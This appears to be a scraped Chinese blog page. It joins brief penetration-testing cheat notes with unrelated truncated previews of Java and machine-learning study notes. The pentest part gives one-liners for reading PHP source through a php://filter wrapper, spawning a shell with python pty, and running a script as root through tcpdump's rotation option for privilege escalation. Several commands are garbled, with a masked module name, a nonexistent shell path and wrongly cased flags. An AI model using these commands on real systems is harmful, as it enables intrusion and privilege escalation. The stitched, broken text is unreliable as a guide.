原理
把php檔案用base64加密後可以跳過執行,把源**當做字串傳輸
例如:
目標檔案:phpinfo.php
執行:
php://filter/convert.base64-encode/resource=phpinfo.php
注:執行後獲得的文字檔案要用bese64解碼以獲取源**
原理
用python暫時開啟乙個http檔案傳輸鏈結
python -m ******httpserver 80
注: 80指http服務開啟的埠
原理
當前使用python的使用者會開啟乙個bash
在滲透測試時如果可執行python使用者許可權過高有可利用性
python -c "import pty; pty.spawn('/bin/shell')"
tcpdump是乙個抓包工具,在此程式許可權過高時可以利用提權
原理
執行tcpdump抓包,同時丟棄抓到的包再去執行指定指令碼
tcpdump -ln -w /dev/null -g 1 -w 1 -z /tmp/shell -z root
shell為要執行的指令碼檔案
root為執行使用者
Java學習個人備忘錄之多型
物件的多型性 class 動物 class 貓 extends 動物 class 狗 extends 動物 貓 x new 貓 意思是建立本類的物件 new 貓 並通過本類的引用指向本類的物件。動物 x new 貓 所以也可以這樣寫 乙個物件兩種形態.上面的 表示,用貓型別建立物件,用動物型別指向....
Java學習個人備忘錄之關鍵字final
final關鍵字 final可以修飾類,方法,變數。final修飾的類不可以被繼承 final修飾的方法不可以被覆蓋 final修飾的變數是乙個常量。只能被賦值一次。內部類只能訪問被final修飾的區域性變數。class fu class zi extends fu 從上面可以看出繼承是有弊端的,就...
機器學習公開課備忘錄(二)神經網路與BP演算法
神經網路是針對特徵過多,分布非線性的監督學習類問題提出的,模仿人類大腦的工作方式。例如 影象判別 下面這張取自 的可以很好地說明前向演算法,對於神經網路,特徵所在的層稱為輸入層,即此處的 a 結果層被成為輸出層,即為此處的 a 中間的層都被成為隱藏層。可以看到,計算隱藏層及輸出層的神經元輸出,即是對...